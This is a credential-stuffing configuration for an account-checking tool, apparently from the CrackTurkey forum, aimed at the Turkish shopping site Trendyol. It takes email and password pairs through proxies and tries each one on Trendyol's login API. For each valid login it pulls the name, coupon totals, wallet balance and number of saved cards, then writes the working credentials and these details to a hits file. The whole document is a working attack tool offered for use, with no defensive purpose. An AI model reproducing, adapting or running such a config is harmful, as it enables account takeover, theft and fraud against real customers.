[SETTINGS]
{
  "Name": "WEB - Trendyol",
  "SuggestedBots": 70,
  "MaxCPM": 0,
  "LastModified": "2022-01-30T20:21:12.3863821+03:00",
  "AdditionalInfo": "❤️ CrackTurkey.Com ❤️",
  "RequiredPlugins": [],
  "Author": "! Muhammed | CT",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "WEB_-_Trendyol",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LoginGonder REQUEST POST "https://auth.trendyol.com/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: tr-TR,tr;q=0.9" 
  HEADER "application-id: 1" 
  HEADER "content-type: application/json;charset=UTF-8" 
  HEADER "culture: tr-TR" 
  HEADER "origin: https://auth.trendyol.com" 
  HEADER "referer: https://auth.trendyol.com/static/fragment?application-id=1&storefront-id=1&culture=tr-TR&language=tr&debug=false" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-gpc: 1" 
  HEADER "storefront-id: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 

#AnahtarKontrol KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "400" 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "guest" 

#TokenCek PARSE "<SOURCE>" JSON "accessToken" -> VAR "Access Token" 

#CaptureUrl REQUEST GET "https://public-sdc.trendyol.com/discovery-web-membergw-service/fragment/user-information/Hesabim/KullaniciBilgileri?culture=tr-TR&storefrontId=1" 
  
  HEADER "authorization: <Access Token>" 

#CaptureCek PARSE "<SOURCE>" LR "firstName\\\":\\\"" "\\\",\\\"" CreateEmpty=FALSE -> CAP "Ad" 

#CaptureCek PARSE "<SOURCE>" LR "lastName\\\":\\\"" "\\\",\\\"" CreateEmpty=FALSE -> CAP "Soyad" 

#CaptureCek PARSE "<SOURCE>" LR "userType\\\":\\\"" "\\\",\\\"" CreateEmpty=FALSE -> CAP "Kullanıcı Tipi" 

#CaptureCek PARSE "<SOURCE>" LR "emailVerificationEnabled\\\":" "," CreateEmpty=FALSE -> CAP "Email Doğrulaması" 

#CaptureFix FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "true" VALUE "✔" 
  KEY "false" VALUE "✖" 
  "<Email Doğrulaması>" -> CAP "Email Doğrulaması" 

#CaptureUrl REQUEST GET "https://public-mdc.trendyol.com/discovery-web-coupongw-service/api/coupons?page=1&culture=tr-TR&storefrontId=1" 
  
  HEADER "authorization: <Access Token>" 

#CaptureCek PARSE "<SOURCE>" JSON "discountAmount" Recursive=TRUE -> VAR "Kupon Toplam Tutar" 

#CaptureFix FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "[" VALUE "" 
  KEY "]" VALUE "" 
  KEY "," VALUE "+" 
  KEY " " VALUE "" 
  "<Kupon Toplam Tutar>" -> VAR "Kupon Toplam Tutar" 

#CaptureCek FUNCTION Compute "<Kupon Toplam Tutar>" -> CAP "Kupon Toplam Tutar" 

#CaptureCek PARSE "<Kupon Toplam Tutar>" LR "" "" CreateEmpty=FALSE -> CAP "Kupon Toplam Tutar" "" " ₺" 

#CaptureUrl REQUEST GET "https://public-sdc.trendyol.com/discovery-web-websfxloyalty-santral/user-info" 
  
  HEADER "authorization: <Access Token>" 

#CaptureCek PARSE "<SOURCE>" JSON "isElite" CreateEmpty=FALSE -> CAP "Elite" 

#CaptureFix FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "True" VALUE "✔" 
  KEY "False" VALUE "✖" 
  "<Elite>" -> CAP "Elite" 

#CaptureUrl REQUEST GET "https://public-sdc.trendyol.com/discovery-web-walletgw-service/fragment/hesabim/cuzdanim?culture=tr-TR&storefrontId=1" 
  
  HEADER "authorization: <Access Token>" 

#CaptureCek PARSE "<SOURCE>" LR "totalAmount\\\":" "," CreateEmpty=FALSE -> CAP "Bakiye" "" " ₺" 

#CaptureUrl REQUEST GET "https://public-sdc.trendyol.com/discovery-web-accountgw-service/api/saved-credit-cards" 
  
  HEADER "authorization: <Access Token>" 

#CaptureCek PARSE "<SOURCE>" JSON "maskedCardNumber" Recursive=TRUE -> VAR "CC Sayısı" 

#CaptureCek FUNCTION CountOccurrences "******" "<CC Sayısı>" -> CAP "CC Sayısı" 

#Author FUNCTION Constant "! Muhammed" -> CAP "Author" 

#Kayıt UTILITY File "DB\\Trendyol [@! Muhammed].txt" AppendLines "-----------------------『𝐓𝐫𝐞𝐧𝐝𝐲𝐨𝐥』-----------------------\\n- E Posta : <USER>\\n- Şifre : <PASS>\\n- Ad : <Ad>\\n- Soyad : <Soyad>\\n- Kullanıcı Tipi : <Kullanıcı Tipi>\\n- Email Doğrulaması : <Email Doğrulaması>\\n- Kupon Toplam Tutar : <Kupon Toplam Tutar>\\n- Elite : <Elite>\\n- Bakiye : <Bakiye>\\n- CC Sayısı : <CC Sayısı>\\n- Author : ! Muhammed\\n---------------------------------------------------------\\n" 

